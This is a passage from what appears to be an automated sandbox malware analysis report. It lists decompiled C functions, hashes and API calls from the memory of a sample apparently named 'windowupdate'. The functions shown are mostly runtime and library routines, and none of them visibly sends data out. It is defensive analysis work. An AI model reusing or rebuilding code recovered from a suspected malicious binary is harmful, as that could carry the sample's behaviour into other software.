									E00D9EF90(_a8, _v20 - 1);
									__eflags = 0;
									return 0;
								}
								E00D82F10(_t68, GetLastError());
								return  *((intOrPtr*)(L00D82F70(_t68)));
							}
							_v16 = E00D9E810(_a8, __eflags, _v8);
							__eflags = _v16;
							if(_v16 == 0) {
								goto L12;
							}
							return _v16;
						}
						E00D82F10(_t64, GetLastError());
						return  *((intOrPtr*)(L00D82F70(_t64)));
					}
					__eflags = E00D9E9E0(_a8);
					if(__eflags != 0) {
						L6:
						 *((short*)(E00D9EA90(_a8))) = 0;
						E00D9EF90(_a8, 0);
						return 0;
					}
					_v12 = E00D9E810(_a8, __eflags, 1);
					__eflags = _v12;
					if(_v12 == 0) {
						goto L6;
					}
					return _v12;
				}
				E00D9EF30(_a8);
				return 0;
			}










                      0x00d9cffc
                      0x00d9d015
                      0x00d9d01c
                      0x00d9d01e
                      0x00d9d07a
                      0x00d9d082
                      0x00d9d085
                      0x00d9d089
                      0x00d9d0ab
                      0x00d9d0ae
                      0x00d9d0ca
                      0x00d9d0cd
                      0x00d9d0d6
                      0x00d9d0e4
                      0x00d9d0ec
                      0x00d9d0ef
                      0x00d9d0f3
                      0x00d9d117
                      0x00d9d11c
                      0x00000000
                      0x00d9d11c
                      0x00d9d0fc
                      0x00000000
                      0x00d9d109
                      0x00d9d0bc
                      0x00d9d0bf
                      0x00d9d0c3
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d9d0c5
                      0x00d9d092
                      0x00000000
                      0x00d9d09f
                      0x00d9d028
                      0x00d9d02a
                      0x00d9d047
                      0x00d9d059
                      0x00d9d062
                      0x00000000
                      0x00d9d067
                      0x00d9d036
                      0x00d9d039
                      0x00d9d03d
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d9d03f
                      0x00d9d001
                      0x00000000

                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 70cd7fdd5a9bea23827917a2cb2885ea9f0d4b8c1660fac02e3c5c54bdd96db7
                      • Instruction ID: 016e3b595f621142a9ecc73318dcd5da49e48084dabc6da24bffb92658fea07d
                      • Opcode Fuzzy Hash: 70cd7fdd5a9bea23827917a2cb2885ea9f0d4b8c1660fac02e3c5c54bdd96db7
                      • Instruction Fuzzy Hash: 3A31F871A00209EFDF14EFA4D856BAE77B6EF44340F148969F51A9B295DB30AE40CB70
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D9D130 Relevance: 6.1, APIs: 4, Instructions: 100COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D9D130(signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t39;
				void* _t40;
				signed short* _t79;

				if(_a4 != 0) {
					_t79 = _a4;
					__eflags =  *_t79 & 0x0000ffff;
					if(( *_t79 & 0x0000ffff) != 0) {
						_t65 = _a12;
						_v8 = E00D9E5E0(_a12, _a16, _a4, 0, 0);
						__eflags = _v8;
						if(_v8 != 0) {
							__eflags = _v8 - E00D9E9C0(_a8);
							if(__eflags <= 0) {
								L12:
								_t39 = E00D9E9C0(_a8);
								_t40 = E00D9EA70(_a8);
								_t70 = _a12;
								_v20 = E00D9E5E0(_a12, _a16, _a4, _t40, _t39);
								__eflags = _v20;
								if(_v20 != 0) {
									E00D9EF70(_a8, _v20 - 1);
									__eflags = 0;
									return 0;
								}
								E00D82F10(_t70, GetLastError());
								return  *((intOrPtr*)(L00D82F70(_t70)));
							}
							_v16 = E00D9E7A0(_a8, __eflags, _v8);
							__eflags = _v16;
							if(_v16 == 0) {
								goto L12;
							}
							return _v16;
						}
						E00D82F10(_t65, GetLastError());
						return  *((intOrPtr*)(L00D82F70(_t65)));
					}
					__eflags = E00D9E9C0(_a8);
					if(__eflags != 0) {
						L6:
						 *((char*)(E00D9EA70(_a8))) = 0;
						E00D9EF70(_a8, 0);
						return 0;
					}
					_v12 = E00D9E7A0(_a8, __eflags, 1);
					__eflags = _v12;
					if(_v12 == 0) {
						goto L6;
					}
					return _v12;
				}
				E00D9EEF0(_a8);
				return 0;
			}










                      0x00d9d13c
                      0x00d9d155
                      0x00d9d15c
                      0x00d9d15e
                      0x00d9d1b8
                      0x00d9d1c0
                      0x00d9d1c3
                      0x00d9d1c7
                      0x00d9d1e9
                      0x00d9d1ec
                      0x00d9d208
                      0x00d9d20b
                      0x00d9d214
                      0x00d9d222
                      0x00d9d22a
                      0x00d9d22d
                      0x00d9d231
                      0x00d9d255
                      0x00d9d25a
                      0x00000000
                      0x00d9d25a
                      0x00d9d23a
                      0x00000000
                      0x00d9d247
                      0x00d9d1fa
                      0x00d9d1fd
                      0x00d9d201
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d9d203
                      0x00d9d1d0
                      0x00000000
                      0x00d9d1dd
                      0x00d9d168
                      0x00d9d16a
                      0x00d9d187
                      0x00d9d197
                      0x00d9d1a0
                      0x00000000
                      0x00d9d1a5
                      0x00d9d176
                      0x00d9d179
                      0x00d9d17d
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d9d17f
                      0x00d9d141
                      0x00000000

                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 936af022869113efbc3e573bf349271d31dc18151dd6437b564b7f5fd6b08539
                      • Instruction ID: 48dcdd2715f21b0835b4de62a2ca5ed6a04df0a283b6ee5f78f6c2cf536c9b39
                      • Opcode Fuzzy Hash: 936af022869113efbc3e573bf349271d31dc18151dd6437b564b7f5fd6b08539
                      • Instruction Fuzzy Hash: 8031B771A00109EBDF14EFA4D855BAE77B6AF84304F108568F51A9B291DB30ED40DBB5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D9ADB0 Relevance: 6.1, APIs: 4, Instructions: 100COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D9ADB0(signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t39;
				void* _t40;

				if(_a4 != 0) {
					if(( *_a4 & 0x0000ffff) != 0) {
						_t65 = _a12;
						_v8 = E00D9AFA0(_a12, _a16, _a4, 0, 0);
						if(_v8 != 0) {
							if(_v8 <= E00D9B130(_a8)) {
								L12:
								_t39 = E00D9B130(_a8);
								_t40 = E00D9B150(_a8);
								_t70 = _a12;
								_v20 = E00D9AFA0(_a12, _a16, _a4, _t40, _t39);
								if(_v20 != 0) {
									E00D9B1D0(_a8, _v20 - 1);
									return 0;
								}
								E00D82F10(_t70, GetLastError());
								return  *((intOrPtr*)(L00D82F70(_t70)));
							}
							_v16 = E00D9B0A0(_a8, _v8);
							if(_v16 == 0) {
								goto L12;
							}
							return _v16;
						}
						E00D82F10(_t65, GetLastError());
						return  *((intOrPtr*)(L00D82F70(_t65)));
					}
					if(E00D9B130(_a8) != 0) {
						L6:
						 *((char*)(E00D9B150(_a8))) = 0;
						E00D9B1D0(_a8, 0);
						return 0;
					}
					_v12 = E00D9B0A0(_a8, 1);
					if(_v12 == 0) {
						goto L6;
					}
					return _v12;
				}
				E00D9B190(_a8);
				return 0;
			}









                      0x00d9adbc
                      0x00d9adde
                      0x00d9ae38
                      0x00d9ae40
                      0x00d9ae47
                      0x00d9ae6c
                      0x00d9ae88
                      0x00d9ae8b
                      0x00d9ae94
                      0x00d9aea2
                      0x00d9aeaa
                      0x00d9aeb1
                      0x00d9aed5
                      0x00000000
                      0x00d9aeda
                      0x00d9aeba
                      0x00000000
                      0x00d9aec7
                      0x00d9ae7a
                      0x00d9ae81
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d9ae83
                      0x00d9ae50
                      0x00000000
                      0x00d9ae5d
                      0x00d9adea
                      0x00d9ae07
                      0x00d9ae17
                      0x00d9ae20
                      0x00000000
                      0x00d9ae25
                      0x00d9adf6
                      0x00d9adfd
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d9adff
                      0x00d9adc1
                      0x00000000

                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 06dd12e7566a2fd0e7687461fd4864bbe860a371ab3b06f54dfbcbb7524106c0
                      • Instruction ID: 07f212be82e86e5d27f2a5625524150a6683afd11d78f62088c649ffe45d4a4f
                      • Opcode Fuzzy Hash: 06dd12e7566a2fd0e7687461fd4864bbe860a371ab3b06f54dfbcbb7524106c0
                      • Instruction Fuzzy Hash: 25311C71A0010DAFDF04EF68E956BAE77B5EF84750F108529F919AB291DB30AD40CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D44C30 Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                      Download Yara Rule
                      C-Code - Quality: 55%
                      			E00D44C30(void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v40;
				char _v52;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				void* _t36;
				intOrPtr* _t59;
				void* _t64;
				void* _t65;
				void* _t71;
				void* _t72;
				void* _t73;

				_t64 =  &_v72;
				memset(_t64, 0xcccccccc, 0x11 << 2);
				_t73 = _t72 + 0xc;
				_t65 = _t64 + 0x11;
				if(_a20 != 0) {
					__imp__#8(_a20);
					E00DC1520(_a20, _t73 - _t73);
				}
				E00D4AF80(_t65,  &_v40, 0, 0x20);
				_t74 = _t73 + 0xc;
				_v52 = 0xffffffff;
				_t59 =  *((intOrPtr*)( *_a4 + 0x18));
				_v60 = E00DC1520( *_t59(_a4, _a8, 0xdc6390, 0x400, _a12 & 0x0000ffff, _a16, _a20,  &_v40,  &_v52), _t73 + 0xc - _t73 + 0xc);
				if(_v60 < 0) {
					_v68 = 0;
					if(E00D47100( &_v40,  &_v40,  &_v68) >= 0) {
						__imp__#201(0, _v68);
						E00DC1520(_t39, _t74 - _t74);
						_t59 = _v68;
						E00DC1520( *((intOrPtr*)( *((intOrPtr*)( *_v68 + 8))))(_t59), _t74 - _t74);
					}
				}
				_push(_t59);
				_push(_v60);
				E00DC14C0(_t71, 0xd44d24);
				_pop(_t36);
				return E00DC1520(_t36, _t71 - _t74 + 0x44);
			}















                      0x00d44c38
                      0x00d44c45
                      0x00d44c45
                      0x00d44c45
                      0x00d44c4b
                      0x00d44c53
                      0x00d44c5b
                      0x00d44c5b
                      0x00d44c68
                      0x00d44c6d
                      0x00d44c70
                      0x00d44ca5
                      0x00d44cb1
                      0x00d44cb8
                      0x00d44cba
                      0x00d44cd0
                      0x00d44cda
                      0x00d44ce2
                      0x00d44cee
                      0x00d44cf9
                      0x00d44cf9
                      0x00d44cd0
                      0x00d44d01
                      0x00d44d04
                      0x00d44d0b
                      0x00d44d10
                      0x00d44d21

                      APIs
                      • VariantInit.OLEAUT32(00000000), ref: 00D44C53
                      • _com_handle_excepinfo.COMSUPP ref: 00D44CC9
                      • SetErrorInfo.OLEAUT32(00000000,00000000,?,00000000), ref: 00D44CDA
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D44D0B
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckErrorInfoInitStackVariantVars@8_com_handle_excepinfo
                      • String ID:
                      • API String ID: 2090126287-0
                      • Opcode ID: 2007fecaffce73e08edcb41ec7032f8118fe9630cf9b6a29d52d2acbd5d38d6b
                      • Instruction ID: 5e5b514ebeb03c4511398926d3687924ce02650513ca8c6653497f96ece6a8e5
                      • Opcode Fuzzy Hash: 2007fecaffce73e08edcb41ec7032f8118fe9630cf9b6a29d52d2acbd5d38d6b
                      • Instruction Fuzzy Hash: F3312976A00229ABCB10EF98D882FDE73B9EB88350F144218F905A7291D630ED458BF1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D5B663 Relevance: 6.1, APIs: 4, Instructions: 84memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 94%
                      			E00D5B663(void* __edx) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				long _v24;
				struct _MEMORY_BASIC_INFORMATION _v52;
				struct _SYSTEM_INFO _v88;
				void* _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t18;
				void* _t20;
				void* _t22;
				char _t24;
				long _t30;
				signed int _t37;
				void* _t41;
				void* _t42;
				signed int _t44;
				long _t46;
				char _t47;
				signed int _t50;
				void* _t51;

				_t41 = __edx;
				_t18 =  *0xdf600c; // 0x71e60372
				_v8 = _t18 ^ _t50;
				_t20 = 4;
				E00DBED10(_t20);
				_t22 = _t51;
				_v16 = _t22;
				if(VirtualQuery(_t22,  &_v52, 0x1c) == 0) {
					L12:
					_t24 = 0;
				} else {
					_v20 = _v52.AllocationBase;
					GetSystemInfo( &_v88);
					_t37 = _v88.dwPageSize;
					_t47 = 0;
					_v12 = 0;
					if(E00D94000( &_v12) != 0 && _v12 > 0) {
						_t47 = _v12;
					}
					_t44 =  ~_t37;
					_t46 = _t47 - 0x00000001 + _t37 & _t44;
					if(_t46 != 0) {
						_t46 = _t46 + _t37;
					}
					_t30 = _t37 + _t37;
					if(_t46 < _t30) {
						_t46 = _t30;
					}
					_t42 = (_t44 & _v16) - _t46;
					if(_t42 < _v20 + _t37 || VirtualAlloc(_t42, _t46, 0x1000, 4) == 0 || VirtualProtect(_t42, _t46, 0x104,  &_v24) == 0) {
						goto L12;
					} else {
						_t24 = 1;
					}
				}
				return E00D47280(_t24, _t37, _v8 ^ _t50, _t41, _t42, _t46);
			}



























                      0x00d5b663
                      0x00d5b66b
                      0x00d5b672
                      0x00d5b67a
                      0x00d5b67b
                      0x00d5b680
                      0x00d5b689
                      0x00d5b694
                      0x00d5b714
                      0x00d5b714
                      0x00d5b696
                      0x00d5b699
                      0x00d5b6a0
                      0x00d5b6a6
                      0x00d5b6ac
                      0x00d5b6af
                      0x00d5b6b9
                      0x00d5b6c0
                      0x00d5b6c0
                      0x00d5b6c6
                      0x00d5b6ca
                      0x00d5b6cc
                      0x00d5b6ce
                      0x00d5b6ce
                      0x00d5b6d0
                      0x00d5b6d5
                      0x00d5b6d7
                      0x00d5b6d7
                      0x00d5b6df
                      0x00d5b6e5
                      0x00000000
                      0x00d5b70f
                      0x00d5b711
                      0x00d5b711
                      0x00d5b6e5
                      0x00d5b729

                      APIs
                      • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00D5B68C
                      • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 00D5B6A0
                      • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004,?,?,?,0000001C), ref: 00D5B6F0
                      • VirtualProtect.KERNEL32(?,-00000001,00000104,?,?,?,0000001C), ref: 00D5B705
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Virtual$AllocInfoProtectQuerySystem
                      • String ID:
                      • API String ID: 3562403962-0
                      • Opcode ID: 99964fae8bfbe0bb80b3c9a858099a8255afd7493c79aaccae4bf60cca3f0d1b
                      • Instruction ID: 82d52ee940c9226bab2cabacbfeed0190cde2436b457788e90c054abdda40d91
                      • Opcode Fuzzy Hash: 99964fae8bfbe0bb80b3c9a858099a8255afd7493c79aaccae4bf60cca3f0d1b
                      • Instruction Fuzzy Hash: C2214172E00219ABDF209BA59C85EEEB7B8EF44755F190526AD05E7241E7709904CAB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D56980 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D56980(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v28;
				char _v36;
				char* _t18;
				void* _t22;
				char* _t25;
				intOrPtr _t46;
				intOrPtr _t51;
				intOrPtr _t52;
				char* _t53;

				_t18 =  *0xf20640; // 0x0
				if( *_t18 != 0) {
					E00D4F270( &_v12, 0x26);
					E00D4FD40( &_v12, E00D575A0(__ebx, __edi, __esi, __eflags,  &_v28));
					_t22 = E00D5A6C0( &_v12);
					__eflags = _t22;
					if(_t22 == 0) {
						L6:
						E00D4F350(_a4, 2);
						return _a4;
					}
					_t25 =  *0xf20640; // 0x0
					__eflags =  *_t25 - 0x40;
					if( *_t25 != 0x40) {
						goto L6;
					}
					_t51 =  *0xf20640; // 0x0
					_t52 = _t51 + 1;
					 *0xf20640 = _t52;
					_v20 = E00D50060("::", 2);
					_v16 = _t52;
					E00D4FCA0( &_v12,  &_v20);
					E00D4FD40( &_v12, E00D5A1E0(__ebx, __edi, __esi,  &_v36, 0, 0));
					_t53 =  *0xf20640; // 0x0
					__eflags =  *_t53 - 0x40;
					if( *_t53 != 0x40) {
						goto L6;
					}
					_t46 =  *0xf20640; // 0x0
					 *0xf20640 = _t46 + 1;
					E00D4F240(_a4,  &_v12);
					return _a4;
				}
				E00D4F350(_a4, 1);
				return _a4;
			}















                      0x00d56986
                      0x00d56990
                      0x00d569a9
                      0x00d569be
                      0x00d569c6
                      0x00d569cb
                      0x00d569cd
                      0x00d56a57
                      0x00d56a5c
                      0x00000000
                      0x00d56a61
                      0x00d569d3
                      0x00d569db
                      0x00d569de
                      0x00000000
                      0x00000000
                      0x00d569e0
                      0x00d569e6
                      0x00d569e9
                      0x00d569fe
                      0x00d56a01
                      0x00d56a0b
                      0x00d56a24
                      0x00d56a29
                      0x00d56a32
                      0x00d56a35
                      0x00000000
                      0x00000000
                      0x00d56a37
                      0x00d56a40
                      0x00d56a4d
                      0x00000000
                      0x00d56a52
                      0x00d56997
                      0x00000000

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00D56997
                        • Part of subcall function 00D4F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 00D4F3AE
                      • DName::isValid.LIBCMTD ref: 00D569C6
                      • Mailbox.LIBCMTD ref: 00D56A4D
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Name$MailboxName::Name::isNode::makeStatusValid
                      • String ID:
                      • API String ID: 3478594962-0
                      • Opcode ID: 8558d1290fdc147575103a53a26ffd621e78bfba342a522b91c8ef0a20c4fc85
                      • Instruction ID: 34610b98329929f7d86bd8d531747bae1a611d84bb248dfccd2b27949299ff7f
                      • Opcode Fuzzy Hash: 8558d1290fdc147575103a53a26ffd621e78bfba342a522b91c8ef0a20c4fc85
                      • Instruction Fuzzy Hash: D32156B1900118ABDF14EF54DC92EAE7B74EF50305F444168FD1A6B192EB70AA55CBB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D55B40 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D55B40(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v12;
				char _v20;
				char* _t12;
				intOrPtr _t20;
				char* _t30;

				_t12 =  *0xf20640; // 0x0
				if( *_t12 != 0) {
					E00D586C0(__ebx, __edi, __esi,  &_v12);
					E00D4FDE0( &_v12, 0x2e);
					E00D4FD40( &_v12, E00D5A1E0(__ebx, __edi, __esi,  &_v20, 0, 0));
					_t30 =  *0xf20640; // 0x0
					if( *_t30 != 0x40) {
						E00D4F350(_a4, 2);
						return _a4;
					}
					_t20 =  *0xf20640; // 0x0
					 *0xf20640 = _t20 + 1;
					E00D4F240(_a4,  &_v12);
					return _a4;
				}
				E00D4F350(_a4, 1);
				return _a4;
			}








                      0x00d55b46
                      0x00d55b50
                      0x00d55b65
                      0x00d55b72
                      0x00d55b8b
                      0x00d55b90
                      0x00d55b9c
                      0x00d55bc1
                      0x00000000
                      0x00d55bc6
                      0x00d55b9e
                      0x00d55ba6
                      0x00d55bb2
                      0x00000000
                      0x00d55bb7
                      0x00d55b57
                      0x00000000

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00D55B57
                        • Part of subcall function 00D4F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 00D4F3AE
                      • DName::operator+=.LIBCMTD ref: 00D55B72
                      • Mailbox.LIBCMTD ref: 00D55BB2
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Name$MailboxName::Name::operator+=Node::makeStatus
                      • String ID:
                      • API String ID: 481169399-0
                      • Opcode ID: dad1ff594e516941f4c8bcb0fd7610676d80a11af8728140ed287055cdf95afb
                      • Instruction ID: 6a39b2770ce64c0af7f3dd9e0b6c82932ce72f1dc3b6db3855718190c31f9fec
                      • Opcode Fuzzy Hash: dad1ff594e516941f4c8bcb0fd7610676d80a11af8728140ed287055cdf95afb
                      • Instruction Fuzzy Hash: 25014075A00208ABEF14EF54DC96FAE3B74EB40305F044068FC0A5B2A6DB71BA55CBA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D36860 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 40memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 89%
                      			E00D36860(intOrPtr __ecx, void* __esi, void* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _t19;
				void* _t20;

				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				if(_a4 != 0) {
					_v12 = E00DC1520(HeapFree( *(_v8 + 4), 0, _a4), _t20 - _t20);
					_t24 = _v12;
					if(_v12 == 0) {
						_t10 = L00D84930(_t24, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlmem.h", 0x9a, 0, "%ls", L"bSuccess");
						_t20 = _t20 + 0x18;
						if(_t10 == 1) {
							asm("int3");
						}
					}
				}
				return E00DC1520(_t10, _t19 - _t20 + 8);
			}







                      0x00d36867
                      0x00d3686e
                      0x00d36875
                      0x00d3687c
                      0x00d3689a
                      0x00d3689d
                      0x00d368a1
                      0x00d368bb
                      0x00d368c0
                      0x00d368c6
                      0x00d368c8
                      0x00d368c8
                      0x00d368c6
                      0x00d368a1
                      0x00d368d7

                      APIs
                      • HeapFree.KERNEL32(?,00000000,00000000), ref: 00D3688D
                      Strings
                      • %ls, xrefs: 00D368A8
                      • bSuccess, xrefs: 00D368A3
